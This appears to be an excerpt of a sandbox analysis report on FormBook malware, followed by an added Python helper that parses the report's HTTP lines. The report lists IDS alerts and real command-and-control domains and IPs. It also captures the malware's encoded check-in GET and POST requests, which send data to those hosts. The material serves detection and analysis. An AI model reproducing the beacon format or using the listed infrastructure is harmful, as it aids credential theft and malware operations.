            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49731 -> 91.195.240.123:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49732 -> 91.195.240.123:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49734 -> 91.195.240.123:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49735 -> 162.0.237.22:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49736 -> 162.0.237.22:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49738 -> 162.0.237.22:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49739 -> 103.168.172.37:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49740 -> 103.168.172.37:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49742 -> 103.168.172.37:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49743 -> 104.37.39.71:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49744 -> 104.37.39.71:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49746 -> 104.37.39.71:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49747 -> 199.59.243.225:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49748 -> 199.59.243.225:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49750 -> 199.59.243.225:80
            Source: Joe Sandbox View IP Address: 217.160.0.111
            Source: Joe Sandbox View IP Address: 162.0.237.22
            Source: Joe Sandbox View ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
            Source: Joe Sandbox View ASN Name: ONECOMDK
            Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS
            Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic HTTP traffic detected: GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=D5+pF2/O5onkRgswN5mCVTTvHr6l6Q5GMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiEBBB3RCutNlD9KPyQG6aNo0jRjsCiw== HTTP/1.1
                Host: www.dty377.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global traffic HTTP traffic detected: GET /mcz6/?1Joh=jpQBXhuFRU/tY42PEy1MRCLekuE2gkbQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREibl9IXZIQ7kou/2QQYtq6MxCehvw2Hq6A==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                Host: www.lenslaser.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global traffic HTTP traffic detected: GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1gMpqWDMKZB4BsRbutJiIudg/fevYEHw== HTTP/1.1
                Host: www.allinone24.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global traffic HTTP traffic detected: GET /mcz6/?1Joh=jpQBXhuFRU/tY42PEy1MRCLekuE2gkbQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREibl9IXZIQ7kou/2QQYtq6MxCehvw2Hq6A==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                Host: www.lenslaser.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global traffic HTTP traffic detected: GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=t2ltNu02BWCxFJkDVXGm6lgSI2VyyVBo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33fhcSA/1GWguFcrikpDXwe5bKKbqlQA== HTTP/1.1
                Host: www.carliente.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global traffic HTTP traffic detected: GET /mcz6/?1Joh=+LASaW8sLlti/Y5moa0QLjD+NRT0ctxfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6Vq9cD+KipKFAhgCA6j04PZFMUkTXmsCQ==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                Host: www.walletweb367.top
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global traffic HTTP traffic detected: GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=Z7d5vO3PiPWE/zeG4Btin5s4Ysi+TbPypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08UqI4ilaLC+vP+XuzsWsJjJ3qBfbOqHA== HTTP/1.1
                Host: www.deaybrid.info
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global traffic HTTP traffic detected: GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=WM8YJa5qA0NkIP/QQImrOwC+xPjRZGMWxn5RlfXsP+w6QT8BWCtnYGsQFWxr+5Q3wXsj3+rXjilTrq1L87WNvDgoePcC7Qc9BGKrDLvXVkg0rvhMMA== HTTP/1.1
                Host: www.celebration24.co.uk
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global traffic HTTP traffic detected: GET /mcz6/?1Joh=PB65ht3xmDnV1ShZ+uHkcVi2Uq9TdnP+w4dQHmlxp9S6BIZIF1eyIZ9SallNAheKgV6/CipsbblBAwuU+20rV9UCB7jgFNORqHszkZ5HGMai3UIp4A==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                Host: www.gledingakademiet.no
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global traffic HTTP traffic detected: GET /mcz6/?1Joh=qn3zkYHztMKe8mzhAMvQ2dUsB2FJeuQFLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOZU6owkhcBiV/M9JN6GagiG0Bu0xexw==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                Host: www.zwervertjes.be
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global traffic DNS traffic detected: DNS query: www.dty377.com
            Source: global traffic DNS traffic detected: DNS query: www.lenslaser.com
            Source: global traffic DNS traffic detected: DNS query: www.allinone24.shop
            Source: global traffic DNS traffic detected: DNS query: www.carliente.com
            Source: global traffic DNS traffic detected: DNS query: www.walletweb367.top
            Source: global traffic DNS traffic detected: DNS query: www.deaybrid.info
            Source: global traffic DNS traffic detected: DNS query: www.prizesupermarket.com
            Source: global traffic DNS traffic detected: DNS query: www.jrksa.info
            Source: global traffic DNS traffic detected: DNS query: www.cookedatthebottom.com
            Source: global traffic DNS traffic detected: DNS query: www.celebration24.co.uk
            Source: global traffic DNS traffic detected: DNS query: www.gledingakademiet.no
            Source: global traffic DNS traffic detected: DNS query: www.alfaspa.net
            Source: global traffic DNS traffic detected: DNS query: www.zwervertjes.be
            Source: global traffic DNS traffic detected: DNS query: www.maerealtysg.com
            Source: global traffic DNS traffic detected: DNS query: www.polhi.lol
            Source: unknown HTTP traffic detected: POST /mcz6/ HTTP/1.1
                Host: www.lenslaser.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.lenslaser.com
                Referer: http://www.lenslaser.com/mcz6/
                Connection: close
                Content-Length: 193
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: max-age=0
                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                Data Ascii: 1Joh=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtKVaSkHlu83PLaX+dVUGWrcKrNqgq
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 16 May 2024 15:19:04 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 16 May 2024 15:19:06 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 16 May 2024 15:19:09 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 16 May 2024 15:19:12 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 16 May 2024 15:19:35 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 16 May 2024 15:19:40 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 16 May 2024 15:19:42 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 16 May 2024 15:20:29 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 16 May 2024 15:20:31 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 16 May 2024 15:20:34 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 16 May 2024 15:21:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_159389ade035d0ad7fc69ce6881f36b4Content-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 16 May 2024 15:21:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_c73188c602a93f2d446cefd441e22c7bContent-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 16 May 2024 15:21:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_58458f13e6035bc12306a06a351c87b4Content-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 16 May 2024 15:21:14 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 544Connection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_90d904d2c1f6786a7c2c3ed3ae7772ddData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 64 6f 6d 61 69 6e 2c 20 79 6f 75 20 63 61 6e 20 73 65 74 75 70 20 61 20 70 61 67 65 20 68 65 72 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 2e 68 65 6c 70 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 31 35 30 30 30 30 30 32 38 30 31 34 31 22 3e 63 72 65 61 74 69 6e 67 20 61 20 70 61 67 65 2f 77 65 62 73 69 74 65 20 69 6e 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>No page 
found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 18Content-Type: text/plainDate: Thu, 16 May 2024 15:21:20 GMTServer: CaddyConnection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 18Content-Type: text/plainDate: Thu, 16 May 2024 15:21:23 GMTServer: CaddyConnection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 18Content-Type: text/plainDate: Thu, 16 May 2024 15:21:26 GMTServer: CaddyConnection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
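Every response above is a 404, from three different server stacks (Apache, nginx, Caddy), and the report renders each one as a run-together header string followed by a "Data Raw" hex dump. For the nginx responses the body is chunked and carries Content-Encoding: br, so the "Data Ascii" column is unreadable until the chunks are reassembled and brotli-decompressed. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it rebuilds status line, headers and body bytes from such a line, undoes chunked framing where present and reports the content encoding that still has to be decoded. The Caddy line is copied verbatim from above, the chunked line is constructed, and the list of header names used to split the headers is an assumption to extend for other responses.

```python
"""Turn a Joe Sandbox 'HTTP traffic detected' line back into an HTTP response:
status line, headers, and the body decoded from the 'Data Raw' hex dump.
Added example; not part of the Joe Sandbox report or its tooling."""
import re

# The report prints headers back to back with no separator, so they can only be
# split on header names known to occur (assumption: extend for other responses).
HEADER_NAMES = ("Date", "Server", "Content-Length", "Connection", "Content-Type",
                "Transfer-Encoding", "Content-Encoding", "x-backend", "X-Frontend",
                "X-Trace-Id")
_SPLIT = re.compile("(" + "|".join(re.escape(h) for h in HEADER_NAMES) + "): ")


def parse_response(line):
    """Return (status, headers, raw_bytes) for one report line."""
    _, _, rest = line.partition("HTTP traffic detected: ")
    head, _, tail = rest.partition("Data Raw: ")
    hex_dump = tail.split("Data Ascii: ", 1)[0]      # drop the report's ASCII rendering
    parts = _SPLIT.split(head)                        # [status, name, value, name, value, ...]
    headers = {n.lower(): v.strip() for n, v in zip(parts[1::2], parts[2::2])}
    return parts[0].strip(), headers, bytes.fromhex(hex_dump)


def dechunk(raw):
    """Undo HTTP/1.1 chunked framing: <hex size>CRLF<data>CRLF ... 0CRLFCRLF."""
    out, pos = bytearray(), 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return bytes(out)
        pos = eol + 2
        out += raw[pos:pos + size]
        pos += size + 2                               # skip the CRLF after the chunk data


def decode_response(line):
    """Body bytes as the server framed them, plus any content encoding still to undo
    (the nginx responses above report 'br', which needs a brotli decoder)."""
    status, headers, raw = parse_response(line)
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(raw)
    else:
        body = raw[:int(headers.get("content-length", len(raw)))]
    return {"status": status, "headers": headers, "body": body,
            "content_encoding": headers.get("content-encoding")}


# Verbatim Caddy response line from the report.
CADDY_LINE = ("Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 18"
              "Content-Type: text/plainDate: Thu, 16 May 2024 15:21:20 GMTServer: CaddyConnection: close"
              "Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found")

# Constructed line in the nginx layout: one five-byte chunk, then the 0 terminator
# (the real nginx bodies above are single 0x115-byte brotli chunks).
CHUNKED_LINE = ("Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx"
                "Date: Thu, 16 May 2024 15:21:05 GMTContent-Type: text/html; charset=iso-8859-1"
                "Transfer-Encoding: chunkedConnection: close"
                "Data Raw: 35 0d 0a 68 65 6c 6c 6f 0d 0a 30 0d 0a 0d 0a Data Ascii: 5hello0")

if __name__ == "__main__":
    for line in (CADDY_LINE, CHUNKED_LINE):
        r = decode_response(line)
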